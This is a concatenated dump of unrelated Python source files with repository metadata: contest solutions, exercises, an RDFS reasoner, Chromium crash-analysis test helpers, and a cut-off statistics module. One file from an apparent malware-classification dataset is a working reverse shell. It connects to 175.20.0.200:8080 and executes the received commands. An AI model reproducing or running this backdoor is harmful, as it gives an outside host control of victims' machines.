""" x.__repr__() <==> repr(x) """
pass
|
[
"pkalita@princeton.edu"
] |
pkalita@princeton.edu
|
67a8e024e53d7041f7109406e394418a30cabb10
|
6bd9d7679011042f46104d97080786423ae58879
|
/1690/c/c.py
|
05a66b00321f18a9b1c0841c33b880eda782958a
|
[
"CC-BY-4.0"
] |
permissive
|
lucifer1004/codeforces
|
20b77bdd707a1e04bc5b1230f5feb4452d5f4c78
|
d1fe331d98d6d379723939db287a499dff24c519
|
refs/heads/master
| 2023-04-28T16:00:37.673566
| 2023-04-17T03:40:27
| 2023-04-17T03:40:27
| 212,258,015
| 3
| 1
| null | 2020-10-27T06:54:02
| 2019-10-02T04:53:36
|
C++
|
UTF-8
|
Python
| false
| false
| 471
|
py
|
from sys import stdin
def input(): return stdin.readline().strip()
def read_int():
return int(input())
def read_ints():
return map(int, input().split())
t = read_int()
for case_num in range(t):
n = read_int()
s = list(read_ints())
f = list(read_ints())
d = []
for i in range(n):
if i == 0 or s[i] >= f[i - 1]:
d.append(f[i] - s[i])
else:
d.append(f[i] - f[i - 1])
print(' '.join(map(str, d)))
|
[
"qqbbnease1004@126.com"
] |
qqbbnease1004@126.com
|
b1db52e476e7f1ade39cda5d0191f6c042142711
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/classvs_20200630154634.py
|
8a7e8665bf8b3e3c22a42c56688dd4c01f2f0c85
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 638
|
py
|
class Person:
age = 0
# this is a constructor
def __init__(self,initialAge):
if initialAge > 0:
self.age = initialAge
else:
self.age = 0
print("Age is not valid, setting age to 0.. ")
def yearPasses(self):
self.age = self.age +1
return self.age
def amOld(self):
if self.age < 13:
print("You are young..")
if self.age >= 13 and self.age < 18:
print("You are a teenager..")
else:
print("You are old..")
# this is an object
person = Person(10)
person.yearPasses()
person.amOld()
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
ed2fdb1bb003f7c36e88a99e59dff4ea2d85a2af
|
42ea9b76bfbf4d609f655d897082fb3f46bf4058
|
/src/minimalkb/services/simple_rdfs_reasoner.py
|
f9a108d6c2e04bd7809837b58efbe8129461d309
|
[
"BSD-3-Clause"
] |
permissive
|
chili-epfl/minimalkb
|
a9ffe957caa8fd24645117e7afbc97b7406c3048
|
25d90d90dc9e8dbf41ba18bf522a80eeb6520dbb
|
refs/heads/master
| 2021-05-20T17:37:52.403932
| 2021-02-25T09:30:09
| 2021-02-25T09:30:09
| 13,498,236
| 4
| 1
|
BSD-3-Clause
| 2021-02-25T02:39:50
| 2013-10-11T12:21:29
|
Python
|
UTF-8
|
Python
| false
| false
| 7,032
|
py
|
import logging; logger = logging.getLogger("minimalKB."+__name__);
DEBUG_LEVEL=logging.DEBUG
import time
import datetime
import sqlite3
from minimalkb.backends.sqlite import sqlhash
from minimalkb.kb import DEFAULT_MODEL
REASONER_RATE = 5 #Hz
class OntoClass:
def __init__(self, name):
self.name = name
self.parents = set()
self.children = set()
self.instances = set()
self.equivalents = set()
def __repr__(self):
return self.name + \
"\n\tParents: " + str(self.parents) + \
"\n\tChildren: " + str(self.children) + \
"\n\tInstances: " + str(self.instances)
class SQLiteSimpleRDFSReasoner:
SYMMETRIC_PREDICATES = {"owl:differentFrom", "owl:sameAs", "owl:disjointWith"}
def __init__(self, database = "kb.db"):
self.db = sqlite3.connect(':memory:') # create a memory database
self.shareddb = sqlite3.connect(database)
# create the tables
# taken from http://stackoverflow.com/questions/4019081
query = None
for line in self.shareddb.iterdump():
if "triples" in line:
query = line
break
self.db.executescript(query)
self.running = True
logger.info("Reasoner (simple RDFS) started. Classification running at %sHz" % REASONER_RATE)
####################################################################
####################################################################
def classify(self):
starttime = time.time()
self.copydb()
models = self.get_models()
newstmts = []
for model in models:
rdftype, subclassof = self.get_missing_taxonomy_stmts(model)
newstmts += [(i, "rdf:type", c, model) for i,c in rdftype]
newstmts += [(cc, "rdfs:subClassOf", cp, model) for cc,cp in subclassof]
newstmts += self.symmetric_statements(model)
if newstmts:
logger.debug("Reasoner added new statements to the knowledge base:\n -" +\
"\n - ".join(["%s %s %s (in %s)" % stmt for stmt in newstmts]))
self.update_shared_db(newstmts)
logger.info("Classification took %fsec." % (time.time() - starttime))
def get_models(self):
with self.db:
return [row[0] for row in self.db.execute("SELECT DISTINCT model FROM triples")]
def get_onto(self, db, model = DEFAULT_MODEL):
onto = {}
rdftype = None
subclassof = None
equivalentclasses = None
with db:
rdftype = {(row[0], row[1]) for row in db.execute(
'''SELECT subject, object FROM triples
WHERE (predicate='rdf:type' AND model=?)
''', [model])}
subclassof = {(row[0], row[1]) for row in db.execute(
'''SELECT subject, object FROM triples
WHERE (predicate='rdfs:subClassOf' AND model=?)
''', [model])}
equivalentclasses = {(row[0], row[1]) for row in db.execute(
'''SELECT subject, object FROM triples
WHERE (predicate='owl:equivalentClass' AND model=?)
''', [model])}
for cc, cp in subclassof:
parent = onto.setdefault(cp, OntoClass(cp))
child = onto.setdefault(cc, OntoClass(cc))
child.parents.add(parent)
parent.children.add(child)
for i, c in rdftype:
onto.setdefault(c, OntoClass(c)).instances.add(i)
for ec1, ec2 in equivalentclasses:
equi1 = onto.setdefault(ec1, OntoClass(ec1))
equi2 = onto.setdefault(ec2, OntoClass(ec2))
equi1.equivalents.add(equi2)
equi2.equivalents.add(equi1)
return onto, rdftype, subclassof
def get_missing_taxonomy_stmts(self, model = DEFAULT_MODEL):
onto, rdftype, subclassof = self.get_onto(self.db, model)
newrdftype = set()
newsubclassof = set()
def addinstance(instance, cls):
newrdftype.add((instance, cls.name))
for p in cls.parents:
addinstance(instance, p)
def addsubclassof(scls, cls):
newsubclassof.add((scls.name, cls.name))
for p in cls.parents:
addsubclassof(scls, p)
for name, cls in onto.items():
for i in cls.instances:
addinstance(i, cls)
for p in cls.parents:
addsubclassof(cls, p)
for equivalent in cls.equivalents:
for i in cls.instances:
addinstance(i, equivalent)
for p in cls.parents:
addsubclassof(equivalent, p)
newrdftype -= rdftype
newsubclassof -= subclassof
return newrdftype, newsubclassof
def symmetric_statements(self, model):
with self.db:
stmts = {(row[0], row[1], row[2], model) for row in self.db.execute(
'''SELECT subject, predicate, object FROM triples
WHERE (predicate IN ('%s') AND model=?)
''' % "', '".join(self.SYMMETRIC_PREDICATES), [model])}
return {(o, p, s, m) for s, p, o, m in stmts} - stmts # so we keep only the new symmetrical statements
######################################################################
######################################################################
def copydb(self):
""" Tried several other options (with ATTACH DATABASE -> that would likely lock the shared database as well, with iterdump, we miss the 'OR IGNORE')
"""
res = self.shareddb.execute("SELECT * FROM triples")
with self.db:
self.db.execute("DELETE FROM triples")
self.db.executemany('''INSERT INTO triples
VALUES (?, ?, ?, ?, ?, ?, ?, ?)''',
res)
def update_shared_db(self, stmts):
logger.debug("Reasoner added %s new statements: %s" % (len(stmts), stmts))
timestamp = datetime.datetime.now().isoformat()
stmts = [[sqlhash(s,p,o,model), s, p, o, model, timestamp] for s,p,o,model in stmts]
with self.shareddb:
self.shareddb.executemany('''INSERT OR IGNORE INTO triples
(hash, subject, predicate, object, model, timestamp, inferred)
VALUES (?, ?, ?, ?, ?, ?, 1)''', stmts)
def __call__(self, *args):
try:
while self.running:
time.sleep(1./REASONER_RATE)
self.classify()
except KeyboardInterrupt:
return
reasoner = None
def start_reasoner(db):
global reasoner
if not reasoner:
reasoner = SQLiteSimpleRDFSReasoner()
reasoner.running = True
reasoner()
def stop_reasoner():
if reasoner:
reasoner.running = False
|
[
"severin.lemaignan@epfl.ch"
] |
severin.lemaignan@epfl.ch
|
ca558fb7c1542d8a31c2201706ddd1b15d043e8c
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/series/4b461e5da45242b5971e42844d148b42.py
|
99ea386f4fc3f7410b9f7ea347e65477581b406a
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 583
|
py
|
def slices(digits, length_of_series):
is_series_longer_than_digits = length_of_series > len(digits)
is_series_less_than_1 = length_of_series < 1
if is_series_longer_than_digits: raise ValueError
if is_series_less_than_1: raise ValueError
def remove_first_element(L):
L.pop(0)
series = []
number_of_series = (len(digits) - length_of_series) + 1
digits = list(map(int, digits))
for _ in range(number_of_series):
series.append(digits[0:length_of_series])
remove_first_element(digits)
return series
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
f12654076d1f91eff74e060ecf6c9c3b0487d989
|
ac216a2cc36f91625e440247986ead2cd8cce350
|
/appengine/predator/analysis/analysis_testcase.py
|
2c001a931cc3aba51f1d550a485ba1f8e897dd97
|
[
"BSD-3-Clause"
] |
permissive
|
xinghun61/infra
|
b77cdc566d9a63c5d97f9e30e8d589982b1678ab
|
b5d4783f99461438ca9e6a477535617fadab6ba3
|
refs/heads/master
| 2023-01-12T21:36:49.360274
| 2019-10-01T18:09:22
| 2019-10-01T18:09:22
| 212,168,656
| 2
| 1
|
BSD-3-Clause
| 2023-01-07T10:18:03
| 2019-10-01T18:22:44
|
Python
|
UTF-8
|
Python
| false
| false
| 5,668
|
py
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
from libs.base_testcase import BaseTestCase
from libs.gitiles.change_log import ChangeLog
from analysis.type_enums import CrashClient
DUMMY_CHANGELOG = ChangeLog.FromDict({
'author': {
'name': 'r@chromium.org',
'email': 'r@chromium.org',
'time': 'Thu Mar 31 21:24:43 2016',
},
'committer': {
'name': 'example@chromium.org',
'email': 'r@chromium.org',
'time': 'Thu Mar 31 21:28:39 2016',
},
'message': 'dummy',
'commit_position': 175900,
'touched_files': [
{
'change_type': 'add',
'new_path': 'a.cc',
'old_path': None,
},
{
'change_type': 'rename',
'old_path': 'old_name.cc',
'new_path': 'new_name.cc',
},
],
'commit_url':
'https://repo.test/+/1',
'code_review_url': 'https://codereview.chromium.org/3281',
'revision': '1',
'reverted_revision': None
})
class MockLog(object): # pragma: no cover
def __init__(self):
self.logs = []
def Log(self, name, message, level):
self.logs.append({'name': name, 'message': message, 'level': level})
class AnalysisTestCase(BaseTestCase): # pragma: no cover.
def _VerifyTwoStackFramesEqual(self, frame1, frame2):
self.assertIsNotNone(frame1, "the first frame is unexpectedly missing")
self.assertIsNotNone(frame2, "the second frame is unexpectedly missing")
self.assertEqual(str(frame1), str(frame2))
self.assertEqual(frame1.dep_path, frame2.dep_path)
def _VerifyTwoCallStacksEqual(self, stack1, stack2):
self.assertIsNotNone(stack1, "the first stack is unexpectedly missing")
self.assertIsNotNone(stack2, "the second stack is unexpectedly missing")
self.assertEqual(len(stack1.frames), len(stack2.frames))
self.assertEqual(stack1.priority, stack2.priority)
self.assertEqual(stack1.format_type, stack2.format_type)
self.assertEqual(stack1.language_type, stack2.language_type)
map(self._VerifyTwoStackFramesEqual, stack1.frames, stack2.frames)
def _VerifyTwoStacktracesEqual(self, trace1, trace2):
self.assertIsNotNone(trace1, "the first trace is unexpectedly missing")
self.assertIsNotNone(trace2, "the second trace is unexpectedly missing")
self.assertEqual(len(trace1.stacks), len(trace2.stacks))
map(self._VerifyTwoCallStacksEqual, trace1.stacks, trace2.stacks)
def GetDummyChangeLog(self):
return copy.deepcopy(DUMMY_CHANGELOG)
def GetDummyClusterfuzzData(
self, client_id=CrashClient.CLUSTERFUZZ, version='1',
signature='signature', platform='win', stack_trace=None,
regression_range=None, testcase_id='213412343',
crash_type='check', crash_address='0x0023',
job_type='android_asan', sanitizer='ASAN', dependencies=None,
dependency_rolls=None, redo=False, security_flag=False):
crash_identifiers = {'testcase_id': testcase_id}
regression_range = regression_range or {
'dep_path': 'src',
'repo_url': 'https://chromium.git',
'old_revision': '3',
'new_revision': '9',
}
customized_data = {
'crash_type': crash_type,
'crash_address': crash_address,
'job_type': job_type,
'sanitizer': sanitizer,
'regression_range': regression_range,
'dependencies': dependencies or [{'dep_path': 'src/',
'repo_url': 'https://repo',
'revision': 'rev'}],
'dependency_rolls': dependency_rolls or [{'dep_path': 'src/',
'repo_url': 'https://repo',
'old_revision': 'rev1',
'new_revision': 'rev5'}],
'testcase_id': testcase_id,
'security_flag': security_flag,
}
crash_data = {
'crash_revision': version,
'signature': signature,
'platform': platform,
'stack_trace': stack_trace,
'regression_range': regression_range,
'crash_identifiers': crash_identifiers,
'customized_data': customized_data
}
if redo:
crash_data['redo'] = True
# This insertion of client_id is used for debugging ScheduleNewAnalysis.
if client_id is not None: # pragma: no cover
crash_data['client_id'] = client_id
return crash_data
def GetDummyChromeCrashData(
self, client_id=CrashClient.CRACAS, version='1', signature='signature',
platform='win', stack_trace=None, regression_range=None, channel='canary',
historical_metadata=None, process_type='browser'):
crash_identifiers = {
'chrome_version': version,
'signature': signature,
'channel': channel,
'platform': platform,
'process_type': process_type,
}
customized_data = {
'historical_metadata': historical_metadata,
'channel': channel,
}
crash_data = {
'chrome_version': version,
'signature': signature,
'platform': platform,
'stack_trace': stack_trace,
'regression_range': regression_range,
'crash_identifiers': crash_identifiers,
'customized_data': customized_data
}
# This insertion of client_id is used for debugging ScheduleNewAnalysis.
if client_id is not None: # pragma: no cover
crash_data['client_id'] = client_id
return crash_data
def GetMockLog(self):
return MockLog()
|
[
"commit-bot@chromium.org"
] |
commit-bot@chromium.org
|
baaf2f9367b44c93bdb2ea25862bb10a4d3d14a2
|
15ce00a910f5404f1ab3d6eb59334c26c5708748
|
/functions/keyword_only.py
|
cbbca0266fc6ae00ec778c065a99907bc58b6732
|
[] |
no_license
|
calazans10/algorithms.py
|
3307be25920428b33e784229c2aa727ac4225423
|
b8b0495fe34645b45aa5366416c1f80d87d18a3b
|
refs/heads/master
| 2020-05-17T13:27:58.481732
| 2013-07-21T13:31:39
| 2013-07-21T13:31:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 265
|
py
|
# -*- coding: utf-8 -*-
def total(initial=5, *numbers, vegetables):
count = initial
for number in numbers:
count += number
count += vegetables
return count
print(total(10, 1, 2, 3, vegetables=50))
print(total(10, 1, 2, 3, vegetables=10))
|
[
"calazans10@gmail.com"
] |
calazans10@gmail.com
|
4db681565b71e2d02636d8c2ff90e16398465c69
|
401ea01ffb848f1eabd8aa17690ec1ff5dc8e6bd
|
/test/test_self_user.py
|
6ef6283a00a67b2ebbd837e2bb6a9c8afd01890c
|
[] |
no_license
|
bbrangeo/python-api-client
|
735acda3627d7a0ddd78ecb1e9617bb4082c9001
|
c2481e0cd012a41aeceefdce289d48509540b909
|
refs/heads/master
| 2020-03-14T18:24:20.888631
| 2018-04-30T14:47:47
| 2018-04-30T14:47:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 849
|
py
|
# coding: utf-8
"""
BIMData API
BIMData API documentation # noqa: E501
OpenAPI spec version: v1
Contact: contact@bimdata.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import bimdata_api_client
from bimdata_api_client.models.self_user import SelfUser # noqa: E501
from bimdata_api_client.rest import ApiException
class TestSelfUser(unittest.TestCase):
"""SelfUser unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testSelfUser(self):
"""Test SelfUser"""
# FIXME: construct object with mandatory attributes with example values
# model = bimdata_api_client.models.self_user.SelfUser() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"hugo.duroux@gmail.com"
] |
hugo.duroux@gmail.com
|
366a391f8c2df41752f3272eb3d7db8337b7d0fe
|
e3840576e475c42160e914487ba91c1defc0b42f
|
/abc_155_D.py
|
8b0cb0d8037837a3e05322550b9f2afb2c20e146
|
[] |
no_license
|
Kuroboo100/atcoder
|
35f92e1a6001430bd96535799594573add78f5db
|
280562ef3f963b24f79b56204ba5a1b35ce84b69
|
refs/heads/master
| 2022-11-25T13:17:02.280672
| 2020-08-03T13:36:40
| 2020-08-03T13:36:40
| 269,625,592
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,146
|
py
|
def mul_minus(m,p,k):
"""
m,p=minus またはplus
順番はminus>>plusの順で与える
出力はl,sの積の組み合わせでk番目に小さい数
"""
p.sort(reverse=True)
m_tmp=0
p_tmp=0
i=0
mul=[m[0]*p[0]]
while i<k:
if p_tmp+1<len(p):
can_1=m[m_tmp]*p[p_tmp+1]
if m_tmp+1<len(m):
can_2=m[m_tmp+1]*p[p_tmp]
if can_1>=can_2:
m_tmp=m_tmp+1
else:
p_tmp=p_tmp+1
mul.append(m[m_tmp]*p[p_tmp])
i+=1
return m[m_tmp]*p[p_tmp]
def mul_plus(m,p,k):
"""
m,p=minus またはplus
順番はminus>>plusの順で与える
出力はl,sの積の組み合わせでk番目に小さい数
"""
m.sort(reversed=True)
tmp=[0,1,0,1]
sm_tmp=tmp[0]
lm_tmp=tmp[1]
sp_tmp=tmp[2]
lp_tmp=tmp[3]
i=0
can=[0,0,0,0]
mul=[]
while i<k:
if sm_tmp+1!=lm_tmp and sm_tmp+1<len(m):
can[0]=m[sm_tmp+1]*m[lm_tmp]
if lm_tmp+1<len(m):
can[1]=m[sm_tmp]*m[lm_tmp+1]
if sp_tmp+1!=lp_tmp and sp_tmp+1<len(p):
can[2]=p[sp_tmp+1]*p[lp_tmp]
if lp_tmp+1<len(p):
can[3]=p[sp_tmp]*p[lp_tmp+1]
if can_1>=can_2:
lm_tmp+=1
else:
sm_tmp+=1
j=can.index(min(can))
tmp[j]+=1
i+=1
mul.append(min(can))
return min(can)
def main():
N,K=map(int,input().strip().split())
A=list(map(int,input().strip().split()))
A.sort()
minus=[]
zero=[]
plus=[]
for n in range(N):
if A[n]<0:
minus.append(A[n])
elif A[n]==0:
zero.apppend(A[n])
else:
plus.append(A[n])
num_minus=len(minus)*len(plus)
num_zero=len(zero)*len(minus)+len(zero)*len(plus)
num_plus=len(plus)*(len(plus)-1)+len(minus)*(len(minus)-1)
if K<=num_minus:
return mul_minus(minus,plus,K)
elif num_minus<K<=num_minus+num_zero:
return 0
else:
k=K-num_minus-num_zero
return mul_plus(minus,plus,k)
if __name__=="__main__":
print(main())
|
[
"yuki.kubota.0223@gmail.com"
] |
yuki.kubota.0223@gmail.com
|
6729ca87ad8b65a551fd5f41d6443586e13baa15
|
4c9580b2e09e2b000e27a1c9021b12cf2747f56a
|
/chapter06/chapter06/wsgi.py
|
3e88f160f773a7fc27dbdb8429834ad511c1267e
|
[] |
no_license
|
jzplyy/xiaoyue_mall
|
69072c0657a6878a4cf799b8c8218cc7d88c8d12
|
4f9353d6857d1bd7dc54151ca8b34dcb4671b8dc
|
refs/heads/master
| 2023-06-26T02:48:03.103635
| 2021-07-22T15:51:07
| 2021-07-22T15:51:07
| 388,514,311
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 411
|
py
|
"""
WSGI config for chapter06 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'chapter06.settings')
application = get_wsgi_application()
|
[
"jzplyy@126.com"
] |
jzplyy@126.com
|
5d8ebf6a2f375bd1c7c82b768a5185bcd628005f
|
b580fd482147e54b1ca4f58b647fab016efa3855
|
/host_im/mount/malware-classification-master/samples/virus/sample_bad356.py
|
a7091ad0c1ea2d013487c02faa2df366dff3846f
|
[] |
no_license
|
Barnsa/Dissertation
|
1079c8d8d2c660253543452d4c32799b6081cfc5
|
b7df70abb3f38dfd446795a0a40cf5426e27130e
|
refs/heads/master
| 2022-05-28T12:35:28.406674
| 2020-05-05T08:37:16
| 2020-05-05T08:37:16
| 138,386,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
import zlib
import tarfile
import socket
import crypt
import lzma
import subprocess
import gzip
import bz2
import hmac
import hashlib
import threading
import zipfile
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
|
[
"barnsa@uni.coventry.ac.uk"
] |
barnsa@uni.coventry.ac.uk
|
7b06911905dd515116322f0cffab02dde6d356fd
|
3a6d382503e11753dd81b291145847a2eabb8ec6
|
/experimental/dsmith/scrapheap/handcheck-crashes.py
|
6bd9c728da3084f4cc4cfb8f5c3850d0b9dcd044
|
[] |
no_license
|
QuXing9/phd
|
7e6f107c20e0b3b1de2b25eb99e0b640a4a0bfcf
|
58ba53b6d78515ed555e40527f6923e28941cc19
|
refs/heads/master
| 2022-02-27T03:29:05.126378
| 2019-10-22T02:46:57
| 2019-10-22T02:46:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,168
|
py
|
#!/usr/bin/env python
import random
import sys
from argparse import ArgumentParser
from dsmith import db
from dsmith.db import *
def yes_no_or_skip(question, default="skip"):
"""Ask a yes/no/skip question via input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is True for "yes" or False for "no".
"""
valid = {"yes": "yes", "y": "yes", "ye": "yes",
"no": "no", "n": "no",
"skip": "skip", "ski": "skip", "sk": "skip", "s": "skip", }
if default is None:
prompt = "[y/n/s]"
elif default == "yes":
prompt = "[Y/n/s]"
elif default == "no":
prompt = "[y/N/s]"
elif default == "skip":
prompt = "[y/n/S]"
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
sys.stdout.write(f"{question} {prompt} ")
choice = input().lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
sys.stdout.write(f"Invalid input, select form {prompt}.\n")
def handcheck(recheck=False, include_all=False):
program = None
with Session() as session:
q = session.query(CLgenProgram).distinct() \
.join(cl_launcherCLgenResult,
cl_launcherCLgenResult.program_id == CLgenProgram.id) \
.filter(CLgenProgram.gpuverified == 1)
if not include_all:
q = q.filter(cl_launcherCLgenResult.status == 0,
cl_launcherCLgenResult.classification == "Wrong code")
if not recheck:
q = q.filter(CLgenProgram.handchecked == None)
num_todo = q.count()
if num_todo:
program = q.limit(1).offset(random.randint(0, num_todo - 1)).first()
print()
print(f"{num_todo} kernels to check")
print("=====================================")
print(program.src)
print()
answer = yes_no_or_skip("Is this a valid kernel?")
if answer == "skip":
print("skip")
else:
valid = answer == "yes"
print(valid)
print()
program.handchecked = 1 if valid else 0
# next check
if program:
handcheck(recheck=recheck, include_all=include_all)
def main():
parser = ArgumentParser(description="Collect difftest results for a device")
parser.add_argument("-H", "--hostname", type=str, default="cc1",
help="MySQL database hostname")
parser.add_argument("-r", "--recheck", action="store_true",
help="include previously checked kernels")
parser.add_argument("-a", "--all", dest="include_all", action="store_true",
help="include all kernels, not just wrong-code")
args = parser.parse_args()
# get testbed information
db_hostname = args.hostname
db_url = db.init(db_hostname)
try:
handcheck(recheck=args.recheck, include_all=args.include_all)
print("done.")
except KeyboardInterrupt:
print("\nthanks for playing")
if __name__ == "__main__":
main()
|
[
"chrisc.101@gmail.com"
] |
chrisc.101@gmail.com
|
1285800c62612518ff3de3b4bd6c8e0c608033a7
|
43a78f0bcd94f617d2c55e5019f3f3475580165d
|
/Udemy/Section 14/RunIETests.py
|
c99fb8fe83ce12a1bd5e1f56a6d79f70c50d2881
|
[] |
no_license
|
ctramm/Python_Training
|
2c35bd36b7cd1ea6598f915fafcf37ca048cf8ed
|
a0864a82bd6fb002c5f1a9aa7fb5d0b18341e6b0
|
refs/heads/master
| 2022-12-04T14:18:30.477562
| 2022-11-12T09:03:25
| 2022-11-12T09:03:25
| 171,736,957
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 255
|
py
|
"""
Section 14: Run Tests on IE
"""
from selenium import webdriver
class RunIETests:
def test_method(self):
driver = webdriver.Ie()
driver.get("http://www.letskodeit.com")
driver.close()
ie = RunIETests()
ie.test_method()
|
[
"ctramm@wiley.com"
] |
ctramm@wiley.com
|
c03c50aefa8eb8ec66658f37fee45ada353f7ca7
|
abad82a1f487c5ff2fb6a84059a665aa178275cb
|
/Codewars/8kyu/plural/Python/test.py
|
94c45c725af33da58916db900b0dd16972a85ea8
|
[
"MIT"
] |
permissive
|
RevansChen/online-judge
|
8ae55f136739a54f9c9640a967ec931425379507
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
refs/heads/master
| 2021-01-19T23:02:58.273081
| 2019-07-05T09:42:40
| 2019-07-05T09:42:40
| 88,911,035
| 9
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 246
|
py
|
# Python - 3.6.0
Test.assert_equals(plural(0), True, 'Plural for 0' )
Test.assert_equals(plural(0.5), True, 'Plural for 0.5')
Test.assert_equals(plural(1), False, '1 is singular!')
Test.assert_equals(plural(100), True, 'Plural for 100')
|
[
"d79523@hotmail.com"
] |
d79523@hotmail.com
|
37b2cfa3b1377db9d4b5444701cb38d3915fb1ed
|
b43103229a5fc3c49285818881eea7c42b8021c2
|
/python标准文档例题/真值测试.py
|
ef253daafb3daa0507df374ce37552f3428e6838
|
[] |
no_license
|
AlienWu2019/Alien-s-Code
|
34eaf60ae7ada4810c3564cee1a25371c1c3f7ad
|
983f68d13a81e6141779d26c84e371b2bf1d2e0d
|
refs/heads/master
| 2020-05-07T18:42:03.723993
| 2019-05-05T14:32:49
| 2019-05-05T14:32:49
| 180,777,724
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 555
|
py
|
import sys,math
def hash_fraction(m,n):
p=sys.hash_info.modulus
while m%p==n%p==0:
m,n=m//p,n//p
if n%p==0:
hash_value=sys.hash_info.inf
else:
hash_value=(abs(m)%p)*pow(n,p-2,p)%p
if m<0:
hash_value=-hash_value
if hash_value==-1:
hash_value=-2
return hash_value
def hash_float(x):
if math.isnan(x):
return sys.hash_info.nan
elif math.isinf(x):
return sys.hash_info.inf if x>0 else -sys.hash_info.inf
else:
return hash_fraction(*x.as_integer_ratio())
|
[
"q582946945@gmail.com"
] |
q582946945@gmail.com
|
56b651f1e53a535c948b8d7ba66fd0d05f4a02d9
|
060877bd2d5ad6ebb4b303e5dfae47afe9afd4f2
|
/mupit/combine_analyses.py
|
16e16a2626b9fdec431a1124cf4672d82dabe14d
|
[
"MIT"
] |
permissive
|
tianyunwang/mupit
|
f0cc92e1495144d2ea11ab60fbedbce70e6ba5e4
|
bca917af1e23b4466f636c6ae29479833c52efae
|
refs/heads/master
| 2020-03-26T04:27:13.342987
| 2018-08-02T23:18:42
| 2018-08-02T23:18:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,886
|
py
|
"""
Copyright (c) 2016 Genome Research Ltd.
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import math
import numpy
import pandas
from scipy.stats import chi2
def fishersMethod(x):
""" function to combine p values, using Fisher's method
Args:
x: list of P-values for a gene
Returns:
combined P-value
"""
x = [ val for val in x if not math.isnan(val) ]
if len(x) == 0:
return numpy.nan
return chi2.sf(-2 * sum(numpy.log(x)), 2 * len(x))
def combine_enrichment_and_clustering(enriched, clust):
""" combine P values from enrichment and clustering tests into a single P value
Args:
enriched: dataframe of de novo enrichment results
clust: dataframe of de novo clustering results
Returns:
a merged dataset where the P values have been combined
"""
# read in p values from clustering analysis, only for genes with >1 mutation
clust = pandas.pivot_table(clust, index=["gene_id"],
columns=["mutation_category"], values="probability", aggfunc=numpy.mean)
clust["hgnc"] = list(clust.index)
columns = ["missense", "nonsense"]
rename = dict(zip(columns, [ "p_{}_clust".format(x) for x in columns ]))
clust = clust.rename(columns=rename)
# merge the datasets
merged = enriched.merge(clust, how="left", on="hgnc")
# calculate a combined p-value for each gene. We don't expect the
# loss-of-function de novos to be clustered, so we don't use that.
p_values = merged[["p_func", "p_missense_clust"]]
merged["p_combined"] = p_values.apply(fishersMethod, axis=1)
# calculate minimum p value across LoF and func + clustering tests
merged["p_min"] = merged[["p_lof", "p_combined"]].min(axis=1)
return merged
def combine_tests(meta_clust, meta_enrich, clust, enrich, pheno_path=None):
""" find the most significant P value for each gene from the P values from
different subsets and different tests.
Args:
